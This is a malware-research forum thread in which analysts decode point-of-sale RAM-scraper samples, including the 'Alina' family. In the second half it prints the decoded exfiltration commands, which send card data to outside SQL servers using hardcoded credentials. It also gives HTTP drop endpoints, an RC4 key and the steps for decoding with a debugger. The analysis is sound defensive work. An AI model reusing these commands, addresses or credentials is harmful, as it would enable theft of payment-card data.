Point-of-Sale malwares / RAM scrapers

[unixfreaxjp]

It was written in January 27th.. Why no one told me this?
I feel so darn stupid to realize that only ME doesn't know anything about the previous details..
I spent a lot of my time researching for nothing..

[bsteo]

You're funny

Any idea about encryption after reading that post?

[unixfreaxjp]

Any idea about encryption after reading that post?

This key in below registry may help:

• HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Retalix\Security, or
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Retalix\Security

Code: Select all

Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0

But I need "data" or "traffic" to test decoding of this key.

Sice we cannot get the traffic in all tries,
the only way left is to reverse this sample the way he did to get the what-so-called "weird strings".

See the below quoted from the post:

And the most epic stuff, I found a weird string used by another crappy function after nopping to see what happened if the malware found something in RAM:

maybe it "sounds" like that.. I would be happy to see that "weird strings" values or just paste the Rx values,
(wasn't that difficult and not risky task to share anyway...and he didnt )

which decodes in:

Oh, F(word) me! "What" to be decoded with "what" to burp these result??
If I may suggest please contact the writer and ask either the traffic data or memory register or that "weird strings" data from him,
because I won't spending more of my time on this with the so scattered details/info..
So many serious high risk infector out there which needed to be nailed too..than this empty cleaned up server..

[aaSSfxxx]

@unixfreakjp: first, I think the "Security" key you found won't help to decode data because it's just windows service manager crap (the malware creates its service of not installer, and then launches the service with the command round above.

Then, for the ugly string I found, it doesn't seem to be an encoded string, but just a list of characters which are taken to build the connection command (there sql server credentials were stored).

Btw if you don't want to load the malware with ollydbg, you can use IDA to have a global
view of the malware and locate interesting runPE (I'll send the ugly string tommorow, I'm on my smartphone here)

[aaSSfxxx]

Btw, I saw the comment of unixfreakjp on my blog, so I'll answer the two questions asked (I have to create another post since I can't edit my previous post) :

1. What was the "weird string" you talk about?

The string I found was

Code: Select all

BLC.bdR3S% 1!rA2l"h=EDWOwf6oU,s0Nec8muMk4Ttp-IiaQP',27h,';)v(xF

, used by the decrypt function at 004019F0 (in TcpAdaptorService1.exe)

2. With "what" you decoded that "weird string" to that sql inject command?

I decoded the function by stepping into the function I showed (at 004019F0), that's all. This function simply does bit permutation, it's not really a crypto function.
And sorry for the details, I was a bit lazy when I wrote the article (and there is nothing to explain, just follow the code with ollydbg).

Btw the sample "mmon.exe" helped me to understand what happened too (it's a debug version of the malware which doesn't include all service managing crap).

[unixfreaxjp]

Hi. Thank's for the kindly explanation. I debugged and found same result

Viewing the string, to find that you're right for the registry key wasn't for this. (tried to brute with the registry keys to many method encryption & doen't come with reasonable result either)
Permutation mentioned are bits operated which making me headache by following this my cui.I'll install IDA for following this more.

PS: I'm so sorry about you have to re-write the blog post. Not of my intention for that.

[EP_X0FF]

Viewing the string, to find that you're right for the registry key wasn't for this. (tried to brute with the registry keys to many method encryption & doen't come with reasonable result either)
Permutation mentioned are bits operated which making me headache by following this my cui.I'll install IDA for following this more.

Simple and primitive swapping. There few "encrypted" strings inside.

First

Code: Select all

"',27h,'4 d3rI-s8UTP9pecvaCwt,1;.BhfLSli2F(%)DQuNREO6MWmb0=k7oA!

decoded to

Code: Select all

svchosts -S  FS1 -U sa -P -Q "INSERT INTO OЃENэOWSET('SQLOLEDB','Network=DBMSSOCN;Address=46.166.178.209,443;uid=sa;pwd=sambo123!', 'SELECT tab from rec..tbl') SELECT '%s'"

How to? Load TcpAdaptorService (SHA-1 89089c3427ecfbdb4694ad07e821650ede514001) malware in olly, goto 004020A0 and start execution from it. Just F7 until 0040265E, where LEA take place. Here you have fully constructed string with probably a malware decoding BUG :D Notice

OЃENэOWSET

which should be

OPENROWSET

Also notice

FS1

which should be

MFS1

but first symbol for me is trashed (actual value 0x5).

Didn't dig too much, as it boring.

Second

Code: Select all

BLC.bdR3S% 1!rA2l"h=EDWOwf6oU,s0Nec8muMk4Ttp-IiaQP',27h,';)v(xF

decoded to

Code: Select all

svchosts.exe -S MFS1 -U sa -P -Q "INSERT INTO OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=46.108.132.18,443;uid=sa;pwd=sambo123!', 'SELECT tab from rec..tbl') SELECT '%s'

Decoder at 004019F0.

[Xylitol]

Win32/Spy.POSCardStealer.B: https://www.virustotal.com/file/b3e15a2 ... 359887855/ > 31/45
a variant of Win32/Spy.POSCardStealer.D: https://www.virustotal.com/file/bc7dd5d ... 359888491/ > 29/46

btw the unknown scraper (http://www.kernelmode.info/forum/viewto ... 756#p17063) is now know as Win32/Spy.POSCardStealer.B
and found a POS malware named 'Alina' i will post more samples later.

[bsteo]

Win32/Spy.POSCardStealer.B: https://www.virustotal.com/file/b3e15a2 ... 359887855/ > 31/45
a variant of Win32/Spy.POSCardStealer.D: https://www.virustotal.com/file/bc7dd5d ... 359888491/ > 29/46

btw the unknown scrapper (http://www.kernelmode.info/forum/viewto ... 756#p17063) is now know as Win32/Spy.POSCardStealer.B

b3e15a281bb3e1f5ef63841c1801118f6262ac8fb1c8daa45fd99c051011de4b

Sends encrypted with RC4 base64 data to: http://192.168.1.9/FUCKERS/post.php
Is this a work in progress? Test/beta? (192.168.1.9)
Data is RC4 encrypted with "B0tswanaRul3z" key.
Seems to be a variant of that mm_bot.exe previously posted by you but more advanced, more options (or just DEBUG?).

bc7dd5d2fcb072941a2aa9752d0ec8e0933d0ee5406b0d117d9c455083e835d6

Sends POST data to: http://84.22.106.94/panel2asdasd/up.php (data as: act=%s&b=%s&c=%s&v=%s&%s=) every 20 seconds!

The guy seems Romanian, his girlfriend is "Alina" ("Alina v2.1", "alina=", "X:\code\grab\src\Release\Alina.pdb")

Is not the same malware.

[Xylitol]

yep exitthematrix i've saw that.
I've more of these 'Alina' including 1.0, 2.1, 3.2 and 3.3 version according to strings found inside.
it's in attach.
https://www.virustotal.com/file/ee29643 ... 359892457/ > 29/46
https://www.virustotal.com/file/7f907b6 ... 359892458/ > 27/46
https://www.virustotal.com/file/ee29643 ... 359892459/ > 29/46
https://www.virustotal.com/file/7f907b6 ... 359892461/ > 27/46
https://www.virustotal.com/file/45c299b ... 359892462/ > 25/46
https://www.virustotal.com/file/56a8a54 ... 359892463/ > 25/46
https://www.virustotal.com/file/ac0f8a3 ... 359892466/ > 27/46
Some are upx packed.